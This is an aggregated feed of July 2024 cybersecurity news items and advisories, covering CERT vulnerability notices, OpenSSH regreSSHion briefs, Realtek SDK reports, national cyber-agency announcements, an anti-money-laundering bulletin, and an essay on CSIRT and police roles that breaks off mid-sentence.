O Centro Nacional de Cibersegurança (CNCS) está presente no Cybersecurity Summer BootCamp, uma iniciativa do Instituto Nacional de Cibersegurança  de Espanha (INCIBE) e da Organização dos Estados Americanos (OAS), que decorre em Leon, Espanha, entre 8 e 18 de julho. O coordenador do CNCS, Lino Santos participou numa mesa-redonda dedicada aos modelos de governação da cibersegurança, da qual também fez parte Andrea Margueri da Agência Nacional de Cibersegurança Italiana (ACN). O coordenador do CNCS apresentou o CNCS e a sua missão, e falou da cibersegurança como uma área que deve assentar num modelo de governação transversal a toda a sociedade. Esta é a 9.ª edição do Cybersecurity Summer BootCamp, um programa internacional de treino especializado em cibersegurança, destinado às Forças de Segurança e Agências, Ministério Público, Juízes e Magistrados, Decisores políticos, Diplomatas e especialistas dos Centros de Resposta a Incidentes. Trata-se de uma convenção reconhecida internacionalmente, que inclui no programa, seminários, palestras especializadas e workshops de acesso restrito.

https://dyn.cncs.gov.pt/pt/detalhe/art/135878/cncs-no-cybersecurity-summer-bootcamp
Cato Networks named a Leader in the 2024 Gartner® Magic Quadrant™ for Single-Vendor SASE
2024-07-09T15:14:51Z | 1720538091

The post Cato Networks named a Leader in the 2024 Gartner® Magic Quadrant™ for Single-Vendor SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/gartner-magic-quadrant-for-single-vendor-sase-2024/
SQL Injection vulnerability in MegaBIP software
2024-07-09T15:00:00Z | 1720537200

During its own research, CERT Polska has found another SQL Injection vulnerability (CVE-2024-6527) in MegaBIP software.

https://cert.pl/en/posts/2024/07/CVE-2024-6527/
Akamai Launches Early Hints to Further Boost User Experience and SEO
2024-07-09T13:00:00Z | 1720530000

https://www.akamai.com/blog/performance/2023/oct/akamai-103-early-hints-prototype-the-results-are-in
Fickle PDFs: exploiting browser rendering discrepancies
2024-07-09T12:51:22Z | 1720529482

Imagine the CEO of a random company receives an email containing a PDF invoice file. In Safari and MacOS Preview, the total price displayed is £399. After approval, the invoice is sent to the accounti

https://portswigger.net/research/fickle-pdfs-exploiting-browser-rendering-discrepancies
Trail of Bits named a leader in cybersecurity consulting services
2024-07-09T11:00:45Z | 1720522845

Trail of Bits has been recognized as a leader in cybersecurity consulting services according to The Forrester Wave™: Cybersecurity Consulting Services, Q2 2024. In this evaluation, we were compared against 14 other top vendors and emerged as a leader for our services. Read the report on our website. What is the Forrester Wave™? Forrester is […]

https://blog.trailofbits.com/2024/07/09/trail-of-bits-named-a-leader-in-cybersecurity-consulting-services/
Vulnerabilities in Longse Technology devices
2024-07-09T11:00:00Z | 1720522800

CERT Polska has received a report about 4 vulnerabilities (from CVE-2024-5631 to CVE-2024-5634) found in Longse Technology products.

https://cert.pl/en/posts/2024/07/CVE-2024-5631/
National Cyber Security Centre's weekly review – 27/2024
2024-07-09T10:33:57Z | 1720521237

This week, we warn you about M365 data breaches and phishing via the hotel booking service. We also give tips for cyber-secure holiday travel.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-272024
National Cyber Security Centre's weekly review – 27/2024
2024-07-09T10:33:57Z | 1720521237

This week, we warn you about M365 data breaches and phishing via the hotel booking service. We also give tips for cyber-secure holiday travel.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-272024
Riigil valmis uus küberturvalisuse strateegia
2024-07-09T10:04:25Z | 1720519465

Majandus- ja Kommunikatsiooniministeeriumil valmis koostöös Riigi Infosüsteemi Ametiga Eesti riiklik küberstrateegia aastateks 2024–2030 „Läbivalt IT-vaatlikum Eesti“, milles nähakse peamise eesmärgina, et Eesti küberruum oleks turvaline, usaldusväärne ja küberohtudele vastupidav.

https://ria.ee/uudised/riigil-valmis-uus-kuberturvalisuse-strateegia
The NCSC and partners issue alert about evolving techniques used by China state-sponsored cyber attackers
2024-07-09T09:30:21Z | 1720517421

APT40 is one of the cyber actors that has embraced the trend of using SoHo devices to launch attacks

https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-alert-about-evolving-techniques-used-by-china-state-sponsored-cyber-attacks
O que são Ataques carpet bombing? Riscos em 2024
2024-07-08T22:54:18Z | 1720479258

https://nsfocusglobal.com/web-stories/ataques-carpet-bombing-2024/
MailGoose: Your Solution to Curb E-mail Spoofing
2024-07-08T15:00:00Z | 1720450800

Protect organizations in your constituency from e-mail spoofing with our tool – mailgoose. In Poland it has already been used by over 25,000 users!

https://cert.pl/en/posts/2024/07/mailgoose/
Defend Against Account Abuse in Financial Services
2024-07-08T13:00:00Z | 1720443600

Learn how Akamai Account Protector defends against account abuse by distinguishing between legitimate and malicious activities.

https://www.akamai.com/blog/security/2024/jun/defend-against-account-abuse-in-financial-services
Making Sense of NIS 2: Adopt a Cybersecurity Blueprint like NIST to Set Your House in Order
2024-07-08T10:00:43Z | 1720432843

In 2023, the European cybersecurity landscape painted a concerning picture. According to a report[1] from ITGovernance.eu, sectors such as energy, utilities, manufacturing, and healthcare were the most breached, indicating a strategic targeting by cybercriminals.  Meanwhile, IBM’s alarming metrics[2] in detection, response, and mitigation further emphasized that enterprise cybersecurity implementations were falling short . The European... The post Making Sense of NIS 2: Adopt a Cybersecurity Blueprint like NIST to Set Your House in Order appeared first on Cato Networks.

https://www.catonetworks.com/blog/making-sense-of-nis-2-adopt-a-cybersecurity-blueprint-like-nist-to-set-your-house-in-order/
Realtek rtl819x Jungle SDK boa setRepeaterSsid stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1891
Realtek rtl819x Jungle SDK configuration file mib_init_value_array heap-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1911
Realtek rtl819x Jungle SDK boa formWsc OS command injection vulnerabilities
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1899
Realtek rtl819x Jungle SDK boa formIpQoS stack-based buffer overflow vulnerabilities
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1895
Realtek rtl819x Jungle SDK boa getInfo stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1903
Realtek rtl819x Jungle SDK boa set_RadvdPrefixParam stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1892
Realtek rtl819x Jungle SDK boa set_RadvdInterfaceParam stack-based buffer overflow vulnerabilities
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1893
Realtek rtl819x Jungle SDK boa formUpload firmware update vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1874
LevelOne WBR-6013 telnetd hard-coded password vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1871
LevelOne WBR-6013 boa formSysCmd leftover debug code vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1873
Realtek rtl819x Jungle SDK boa formFilter stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1875
Realtek rtl819x Jungle SDK boa updateConfigIntoFlash integer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1877
Realtek rtl819x Jungle SDK boa formRoute stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1894
Realtek rtl819x Jungle SDK boa rollback_control_code stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1878
Realtek rtl819x Jungle SDK boa formWsc stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1904
Realtek rtl819x Jungle SDK boa formDnsv6 stack-based buffer overflow vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1876
Realtek rtl819x Jungle SDK boa CSRF protection cross-site request forgery (CSRF) vulnerability
2024-07-08T00:00:00Z | 1720396800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1872
1.ª edição do Bootcamp for Girls junta jovens talentos em Aveiro
2024-07-08T00:00:00Z | 1720396800

A iniciativa Bootcamp For Girls – Portugal decorreu entre 4 e 7 de julho, no Campus da Universidade de Aveiro, com a participação de 24 jovens raparigas, das quais 11 portuguesas e 13 de outros países europeus. A atividade partiu  da organização do Centro Nacional de Cibersegurança, Centro Internet Segura, Cybersecurity Challenge Portugal, Universidade de Aveiro e contou com o apoio da Agência da União Europeia para a Cibersegurança (ENISA).  Promover a atratividade para a área da cibersegurança e segurança da informação de jovens raparigas, estudantes do ensino secundário e ensino superior, através de uma ação de formação e treino abrangente, através da qual se estimula a criação de redes de contacto e de relações futuras entre as jovens participantes foi o objetivo da 1.ª edição do Bootcamp for Girls. A ação proporcionou o contacto das jovens portuguesas interessadas nesta temática com os melhores talentos europeus, como modelo de aprendizagem e treino conjunto. No Bootcamp for Girls estiveram representados 17 países europeus, para além de Portugal: Áustria, Bélgica, Bulgária, Chéquia, Chipre, Dinamarca, Eslováquia, Estónia, Grécia, Hungria, Itália, Países Baixos, Polónia, Sérvia e Suiça. Do programa do Bootcamp For Girls fizeram parte sessões de treino (com grau de dificuldade introdutório e avançado), nas quais estiveram presentes três treinadoras de cariz internacional, palestras e debates sobre o tema das raparigas nas áreas da ciência, tecnologia, engenharia e matemática (STEM), sessões abertas à comunidade e momentos lúdicos como passeios pelos locais emblemáticos da cidade de Aveiro. Durante a atividade decorreram competições “Capture the Flag" (CFT) e workshops dedicados aos temas da não discriminação e igualdade de género. TIC no feminino Dados da Comissão Europeia indicam que, apesar do rápido crescimento do setor de empregabilidade nas áreas de TIC (Tecnologias de Informação e Comunicação), a representatividade das mulheres neste domínio continua muito sub-representada. Segundo as estatísticas europeias, apenas 19% dos especialistas contratados para as áreas de STEM (Science, Technology, Engineering and Mathematics) são mulheres. Em Portugal, de acordo com os dados do Observatório de Cibersegurança, embora o número de cursos de ensino superior na área tenha aumentado, verifica-se um alinhamento semelhante com a média europeia. É por isso essencial, o desenvolvimento de atividades que permitam encorajar a participação de mulheres e jovens nestas áreas. Sobre o Cybersecurity ChallengePT O Cybersecurity ChallengePT resulta de uma cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico, a Universidade do Porto e AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação. A iniciativa é apoiada pelo Centro Internet Segura (CIS). A iniciativa, que todos os anos, conta com centenas de participantes, enquadra-se num programa de formação e treino abrangente, cujo objetivo passa por capacitar o país de recursos nas áreas de cibersegurança e segurança da informação, e com isto atrair, desde cedo, estudantes do ensino secundário e ensino superior. Inserido no eixo Educação do programa INCoDe.2030 e no plano de ação da Estratégia Nacional de Segurança do Ciberespaço, o Cybersecurity ChallengePT pretende dotar os mais jovens das competências digitais e promover a literacia digital, em todos os ciclos de ensino e de aprendizagem ao longo da vida. Visa, ainda, identificar jovens talentos nacionais e despertar-lhes o interesse por uma carreira profissional na área da Cibersegurança.

https://dyn.cncs.gov.pt/pt/detalhe/art/135877/1-edicao-do-bootcamp-for-girls-junta-jovens-talentos-em-aveiro
Auditing the Ask Astro LLM Q&A app
2024-07-05T13:00:28Z | 1720184428

Today, we present the second of our open-source AI security audits: a look at security issues we found in an open-source retrieval augmented generation (RAG) application that could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial of service. This audit follows up on our previous work that identified 11 security vulnerabilities in […]

https://blog.trailofbits.com/2024/07/05/auditing-the-ask-astro-llm-qa-app/
Open Call Europa Digital: Oportunidades de financiamento para reforçar a cibersegurança
2024-07-05T00:00:00Z | 1720137600

Está a decorrer até 21 de janeiro de 2025, a fase de apresentação de propostas no âmbito do Pograma Europa Digital. São 102 milhões de euros disponíveis para reforçar a cibersegurança e as capacidades digitais em toda a UE. (DIGITAL-ECCC-2024-DEPLOY-CYBER-07). Ao nível da cibersegurança, 35 milhões de euros vão ser dedicados a projetos de proteção de grandes instalações industriais e infraestruturas críticas. Vão ser investidos mais 12,8 milhões de euros para continuar a criar, apoiar e alargar os Centros de Operações de Cibersegurança (SOC) nacionais e transfronteiriços. 35 milhões de euros vão ser consagrados à implantação de tecnologias e ferramentas de cibersegurança de ponta. 20 milhões de EUR destinam-se a apoiar os Estados-Membros na aplicação da legislação da UE em matéria de cibersegurança e das estratégias nacionais de cibersegurança.Áreas de ação: DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOC - National SOCs DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOCPLAT – Enlarging existing or Launching New Cross-Border SOC Platforms DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOCSYS – Strengthening the SOC Ecosystem DIGITAL-ECCC-2024-DEPLOY-CYBER-07-KEYTECH – Development and Deployment of Advanced Key Technologies DIGITAL-ECCC-2024-DEPLOY-CYBER-07-LARGEOPER - Preparedness Support and Mutual Assistance, Targeting Larger Industrial Operations and Installations DIGITAL-ECCC-2024-DEPLOY-CYBER-07-CYBERSEC-02 – Support for Implementation of EU Legislation on Cybersecurity and National Cybersecurity Strategies (2024) O Programa Europa Digital complementa investimentos no âmbito de outros programas da UE, tais como o Horizon Europe, o EU4Health, o InvestEU, o Connecting Europe Facility, bem como os investimentos no âmbito do Recovery and Resilience Facility O Programa Europa Digital é implementado através de programas de trabalho plurianuais e apoia investimentos nos seguintes setores: Computação de alto desempenho Nuvem, dados e Inteligência Artificial Cibersegurança Skills digitais avançadas Mais informações na área dedicada ao Centro Nacional de Coordenação (NCC-PT).  

https://dyn.cncs.gov.pt/pt/detalhe/art/135876/open-call-europa-digital-oportunidades-de-financiamento-para-reforcar-a-ciberseguranca
Está disponível a 5.ª edição do Relatório Riscos & Conflitos
2024-07-05T00:00:00Z | 1720137600

Está disppnível a 5.ª edição do Relatório sobre o tema Riscos e Conflitos do Observatório de Cibersegurança do CNCS. O documento analisa os dados sobre incidentes de cibersegurança e cibercrime que afetaram o ciberespaço de interesse nacional em 2023, perspetivando o presente e o futuro em termos de ameaças e tendências. Com a colaboração de doze entidades, este relatório procura ser um instrumento abrangente para análises de risco e para a identificação das medidas de mitigação necessárias para responder com eficácia às ameaças que incidem sobre as entidades nacionais. Destacam-se algumas conclusões desta edição: A criminalidade informática no ciberespaço de interesse nacional aumentou em 2023, embora o número de incidentes de cibersegurança tenha estabilizado segundo alguns indicadores. Destacam-se como ciberameaças mais relevantes o ransomware, o phishing e smishing, outras formas de engenharia social (como a CEO Fraud), as burlas online e o comprometimento de contas. Os ciberataques com mais impacto no ciberespaço de interesse nacional em 2023 foram, sobretudo, de ransomware e com um efeito local, afetando a Administração Pública Local. No entanto, verificaram-se alguns casos de indisponibilidade de serviços com alcance nacional. Os cibercriminosos, os atores estatais e os hacktivistas foram os agentes de ameaça mais relevantes a atuar no ciberespaço de interesse nacional em 2023. Em termos de número e de impacto em serviços, os ciberataques realizados por cibercriminosos foram dominantes. Os indivíduos e as PME foram as vítimas mais frequentes de ciberataques durante 2023. Contudo, a Administração Pública Local foi o tipo de alvo que mais impactos sofreu. Existe uma perceção elevada de que aumentou o risco de uma entidade sofrer um incidente de cibersegurança no ciberespaço de interesse nacional em 2023 e 2024. Como principais tendências para o futuro próximo, destacam-se: a exploração de vulnerabilidades desconhecidas; o aumento das infeções através de pens USB; o risco de cibersabotagem e hacktivismo; o potenciar do cibercrime por via de um maior uso de criptomoedas; mais desinformação com conteúdos de IA generativa; e a persistência de algumas ciberameaças como o phishing, smishing e vishing (com spoofing), burlas online, ransomware e infostealers. Consulte a versão integral do relatório.Consulte a versão do relatório em 15 minutos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135875/esta-disponivel-a-5-edicao-do-relatorio-riscos-conflitos
Pääsukeses saavad ühise esindusõigusega juriidilise isiku juhatuse liikmed volitusi nüüd ringallkirjastada
2024-07-04T10:50:29Z | 1720090229

Riigiportaalis asuv keskne volituste haldamise infosüsteem Pääsuke nägi ilmavalgust käesoleva aasta veebruaris. Arendustöö tulemusena on tänaseks valminud lahendus, mida varasemalt ei ole teadaolevalt Eesti IT-maastikul sellisel kujul lahendatud – nüüd saab ettevõte Pääsukese iseteeninduses volitusi anda ka siis, kui selleks on vaja ettevõtte mitme seadusjärgse esindaja allkirja.

https://ria.ee/uudised/paasukeses-saavad-uhise-esindusoigusega-juriidilise-isiku-juhatuse-liikmed-volitusi-nuud
Cato CTRL Threat Brief: CVE-2024-6387 – OpenSSH RCE Vulnerability (“regreSSHion”)
2024-07-04T07:16:43Z | 1720077403

Executive Summary TL; DR – Multiple versions of OpenSSH are vulnerable to remote code execution. There is no working public PoC, and researchers have only been able to exploit the vulnerability under unique lab conditions. Cato Sockets by default do NOT have a publicly exposed SSH interface, it is always recommended to keep Cato Sockets... The post Cato CTRL Threat Brief: CVE-2024-6387 – OpenSSH RCE Vulnerability (“regreSSHion”) appeared first on Cato Networks.

https://www.catonetworks.com/blog/cve-2024-6387-openssh-rce-vulnerability-regresshion-cato-networks-impact-and-analysis/
The National Cyber Security Centre Finland’s weekly review – 26/2024
2024-07-04T06:43:13Z | 1720075393

This week, we talk about the importance of cyber security exercises and information security during holiday periods, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-262024
The National Cyber Security Centre Finland’s weekly review – 26/2024
2024-07-04T06:43:13Z | 1720075393

This week, we talk about the importance of cyber security exercises and information security during holiday periods, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-262024
Security Alert (A24-07-04): Vulnerability in Apache Tomcat
2024-07-04T04:00:00Z | 1720065600

The Apache Software Foundation released security updates to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Guidance on the Critical OpenSSH Vulnerability regreSSHion
2024-07-03T17:00:00Z | 1720026000

https://www.akamai.com/blog/security-research/2024/jul/2024-openssh-vulnerability-regression-what-to-know-and-do
Cato Networks recognized as a Leader in the 2024 Gartner® Magic Quadrant™ for Single-Vendor SASE Report
2024-07-03T14:50:29Z | 1720018229

SASE is all about strategically solving business problems. The systematic removal of technology barriers standing in the way of business outcomes. It is a brand new “how” (platform) for a well-known “what” (features). When we started Cato Networks in 2015, we were immersed in skepticism. Can you actually build a cloud network that will replace... The post Cato Networks recognized as a Leader in the 2024 Gartner® Magic Quadrant™ for Single-Vendor SASE Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/with-great-leadership-comes-great-responsibility/
Sustainability and ESG: Understanding the Difference and Why It Matters
2024-07-03T13:00:00Z | 1720011600

https://www.akamai.com/blog/sustainability/2024/jul/sustainability-and-esg-understanding-the-difference
US DOJ indicts 24 Sinaloa Cartel associates | Red Flag Bulletin | July 2024
2024-07-03T11:10:41Z | 1720005041

This month’s top stories: Following coordination with Chinese and Mexican law enforcement, US Department of Justice (DOJ) indicts 24 Sinaloa Cartel associates on drug trafficking, money laundering, and possession charges; Venezuela and Monaco added to the Financial Action Task Force’s “grey list” of countries under enhanced money laundering scrutiny and monitoring; and Zimbabwe’s national intelligence agency linked to secret corporate network, thereby violating requirement of full financial oversight and transparency. Europe  Switzerland: Swiss financial services regulator finds HSBC’s Swiss private banking arm breached anti-money laundering rules  On 18 June, the Financial Market Supervisory Authority (Finma), Switzerland’s financial services regulator, announced that it had found that the Swiss private banking arm of HSBC had breached anti-money laundering rules. Finma launched enforcement proceedings against HSBC Switzerland in December 2021 relating to transactions carried out between 2002 and 2015 with a total value of more than USD 300 million. The funds originated from a government institution and were transferred between several accounts in Lebanon via accounts in Switzerland. Finma stated that HSBC Switzerland had failed to carry out adequate checks into the origin, purpose, or background of the funds, and ordered the bank to conduct a review of all its current high-risk client relationships, including with politically exposed persons. Finma also prohibited HSBC Switzerland from onboarding any new politically-exposed persons until the bank submits a report to Finma on the findings of its review. In a statement to the press, HSBC Switzerland acknowledged the matters raised by Finma, but characterised them as “historic” and stated that it would appeal the decision. Belgium: EU prosecutor launches corruption probe into former European Investment Bank officials On 24 June, the European Public Prosecutor’s Office (EPPO), the independent public prosecutor’s office mandated with investigating the misuse of EU funds, announced that it had launched an investigation into two former officials of the European Investment Bank (EIB) for alleged corruption, abuse of influence, and misappropriation of funds. Werner Hoyer, the EIB’s former president (2012-2023), released a statement through legal representatives confirming that he is one of the subjects of the investigation, and characterised the allegations as “absurd and unfounded”. On 25 June, lawyers for Henry von Blumenthal, another former EIB employee, confirmed to news outlets that he is also under investigation, but stated that the precise nature of the allegations against him are unclear. The investigation reportedly relates to compensation payments made by the EIB to von Blumenthal upon his departure from the bank. EPPO stated that it would release no further details regarding the investigation to the public while it remains ongoing. Monaco: Principality added to FATF grey list owing to anti-money laundering deficiencies On 28 June, the Financial Action Task Force (FATF), an intergovernmental money laundering and terrorist financing watchdog, announced that it had added the Principality of Monaco to its list of jurisdictions placed under increased monitoring – known as its “grey list”. FATF stated that while Monaco has made “significant progress” in several areas of its anti-money laundering (AML) and counter terrorism financing (CTF) regime, multiple aspects required improvements. These include improving the application of sanctions for AML and CFT breaches; demonstrating further commitment to seizing criminal assets abroad; increasing the seizure of property suspected to be financed from criminal activities; and strengthening understanding of risks associated with money laundering and income tax fraud. Monaco has introduced measures with a view to improving its AML regime since December 2022, when Moneyval, a body of the Council of Europe responsible for assessing AML and CTF compliance, published a report highlighting the deficiencies in the principality’s risk analysis and enforcement procedures. Experts have highlighted that countries can experience a decline in foreign investment following a grey list designation.

https://www.s-rminform.com/red-flag-bulletin/july-2024
Urgent! Protect the OT Supply Chain Now
2024-07-03T10:59:42Z | 1720004382

All over the world, OT supply chains are under attack. Hacker syndicates and nation-state actors are exploiting the supply chain to get at OT assets and upset operations. Here are some of the prevalent methods that hackers use to disrupt operations and what you can do now to protect against them. Software and Firmware Software […] The post Urgent! Protect the OT Supply Chain Now appeared first on Radiflow.

https://www.radiflow.com/blog/urgent-protect-the-ot-supply-chain-now/
Tasuta e-koolitus aitab IT-teenuseid turvaliselt väljast tellida
2024-07-03T08:49:06Z | 1719996546

Riigi Infosüsteemi Ametil (RIA) on valminud e-kursus, mis annab ülevaate IT-toodete ja -teenuste väljasttellimise parimatest praktikatest.

https://ria.ee/uudised/tasuta-e-koolitus-aitab-it-teenuseid-turvaliselt-valjast-tellida
Security Alert (A24-07-03): Multiple Vulnerabilities in Android
2024-07-03T04:00:00Z | 1719979200

Google has released Android Security Bulletin July 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
The many meanings of “system app” in modern Android
2024-07-03T00:00:00Z | 1719964800

Not all Android apps are created equal. The Settings app on an Android device, for example, can change numerous things that no “normal” app can, regardless of how many permissions that app requests. Apps with special privileges like Settings are often called “system apps.” But what makes an app a “system app”? In answering that question for ourselves, we noticed that AOSP’s resources on the subject are disparate and assume a great deal of Android internals knowledge. We wrote this post to summarize what we learned for the benefit of security researchers, app developers, and enthusiasts alike.

https://rtx.meta.security/reference/2024/07/03/Android-system-apps.html
Grandstream GXP2135 CWMP SelfDefinedTimeZone OS command injection vulnerability
2024-07-03T00:00:00Z | 1719964800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978
Zero Trust Is Revolutionizing API Security in Financial Services
2024-07-02T13:00:00Z | 1719925200

Learn how a Zero Trust approach transforms API security in financial services by ensuring innovation, efficiency, and customer trust amid evolving cyberthreats.

https://www.akamai.com/blog/security/2024/jun/zero-trust-revolutionizing-api-security-financial-services
A hacking hat-trick: previewing three PortSwigger Research publications coming to DEF CON & Black Hat USA
2024-07-02T12:57:08Z | 1719925028

We're delighted to announce three major research releases from PortSwigger Research will be published at both Black Hat USA and DEF CON 32. In this post, we'll offer a quick teaser of each talk, info

https://portswigger.net/research/a-hacking-hat-trick-previewing-three-portswigger-research-publications-coming-to-def-con-amp-black-hat-usa
Vulnerability in Edito CMS software
2024-07-02T10:00:00Z | 1719914400

Local file inclusion vulnerability (CVE-2024-4836) has been found in Edito CMS software.

https://cert.pl/en/posts/2024/07/CVE-2024-4836/
Examining the Polyfill Attack from Akamai's Point of View
2024-07-02T09:00:00Z | 1719910800

https://www.akamai.com/blog/security/2024/jul/2024-polyfill-supply-chain-attack-what-to-know
Is OT Cybersecurity Accurately Represented in Movies & TV?
2024-07-02T08:00:00Z | 1719907200

Cybersecurity is everywhere. And as the world grows more high-tech, so do our movies.

https://blog.scadafence.com/how-accurate-ot-cybersecurity-represented-movies-tv
Security Alert (A24-07-01): Multiple Vulnerabilities in Apache HTTP Server
2024-07-02T04:00:00Z | 1719892800

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-07-02): Vulnerability in OpenSSH
2024-07-02T04:00:00Z | 1719892800

OpenSSH has released a new version to address a vulnerability in various versions of OpenSSH.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2024-6387: regreSSHion RCE in OpenSSH Vulnerability
2024-07-01T18:12:33Z | 1719857553

A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). OpenSSH < 4.4p1 is vulnerable to this signal handler race condition, OpenSSH 4.4p1 <= OpenSSH < 8.5p1 is not vulnerable to this signal handler race condition, OpenSSH 8.5p1 <= OpenSSH < 9.8p1 is vulnerable again to this signal handler race condition.SonicWall is investigating its product line to determine which products and services may be affected by this vulnerability. The Affected and Fixed Products(s) can change as more information becomes available.  As a mitigation please restrict SonicWall product(s) and services SSH access to trusted sources and/or disable SSH access from untrusted Internet sources, then apply the patch as soon as possible when available for impacted products. If you have any further questions on restricting/disabling SSH access or require additional information, please reach out to SonicWall Technical Support. CVE: CVE-2024-6387 Last updated: Oct. 4, 2024, 10:38 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
CVE-2024-1180
2024-07-01T15:18:00Z | 1719847080

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605. Authentication is required to exploit this vulnerability. The specific issue exists within the handling of the name field in the access control user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. The flaw was addressed in firmware: ER605(UN)_V2_2.2.3 Build 20231201

https://claroty.com/team82/disclosure-dashboard/cve-2024-1180
Roles in Cybersecurity: CSIRTs / LE / others
2024-07-01T15:06:58Z | 1719846418

Back in January 2024, I was asked by the Belgian EU Presidency to moderate a panel during their high-level conference on cyber security in Brussels. The topic was the relationship between cyber security and law enforcement: how do CSIRTs and the police / public prosecutors cooperate, what works here and where are the fault lines in this collaboration. As the moderator, I wasn’t in the position to really present my own view on some of the issues, so I’m using this blogpost to document my thinking regarding the CSIRT/LE division of labour. From that starting point, this text kind of turned into a rant on what’s wrong with IT Security. When I got the assignment, I recalled a report I had read years ago: "Measuring the Cost of Cybercrime" by Ross Anderson et al from 2012. In it, the authors try to estimate the effects of criminal actors on the whole economy: what are the direct losses and what are costs of the defensive measures put in place to defend against the threat. The numbers were huge back then, and as various speakers during the conference mentioned: the numbers have kept rising and rising and the figures for 2024 have reached obscene levels. Anderson et al write in their conclusions: "The straightforward conclusion to draw on the basis of the comparative figures collected in this study is that we should perhaps spend less in anticipation of computer crime (on antivirus, firewalls etc.) but we should certainly spend an awful lot more on catching and punishing the perpetrators." Over the last years, the EU has proposed and enacted a number of legal acts that focus on the prevention, detection, and response to cybersecurity threats. Following the original NIS directive from 2016, we are now in the process of transposing and thus implementing the NIS 2 directive with its expanded scope and security requirements. This imposes a significant burden on huge numbers of "essential" and "important entities" which have to heavily invest in their cybersecurity defences. I failed to find a figure in Euros for this, only the estimate of the EU Commission that entities new to the NIS game will have to increase their IT security budget by 22 percent, whereas the NIS1 "operators of essential services" will have to add 12 percent on their current spending levels. And this isn’t simply CAPEX, there is a huge impact on the operational expenses, including manpower and effects on the flexibility of the entity. This all adds up to a huge cost for companies and other organisations. What is happening here? We would never ever tolerate that kind of security environment in the physical world, so why do we allow it to happen online? The physical world So, let’s look at playing field in the physical environment and see how the security responsibilities are distributed there: Defending against low-level crime is the responsibility of every citizen and organisation: you are supposed to lock your doors, you need to screen the people you’re allowing to enter and the physical defences need to sensible: Your office doesn’t need to be a second Fort Knox, but your fences / doors / gates / security personnel need to be adequate to your risk profile. They should be good enough to either completely thwart normal burglars or at least impose such a high risk to them (e.g., required noise and time for a break-in) that most of them are deterred from even trying. One of the jobs of the police is to keep low-level crime from spiralling out of control. They are the backup that is called by entities noticing a crime happening. They respond to alerts raised by entities themselves, their burglar alarms and often their neighbours. Controlling serious, especially organized crime is clearly the responsibility of law enforcement. No normal entity is supposed to be able to defend itself against Al Capone style gangs armed with submachine guns. This is where even your friendly neighbourhood cop is out of his league and the specialists from the relevant branches of the security forces need to be called in. That doesn’t mean that these things never happen at all: there is organized crime in the EU, and it might take a few years before any given gang is brought under control. Defending against physical incursions by another country is the job of the military. They have the big guns; they have the training and thus means to defend the country from outside threats. Hopefully, they provide enough deterrence that they are not needed. Additionally, your diplomats and politicians have worked to create an international environment in which no other nation even contemplates invading your country. We can see here a clear escalation path of physical threats and how the responsibility to deal with them shifts accordingly. The online world Does the same apply to cyber threats? And if not, why? The basics The equivalent of putting a simple lock on your door is basic cyber hygiene: Firewalls, VPNs, shielding management interfaces, spam and malspam filters, a decent patch management, as well 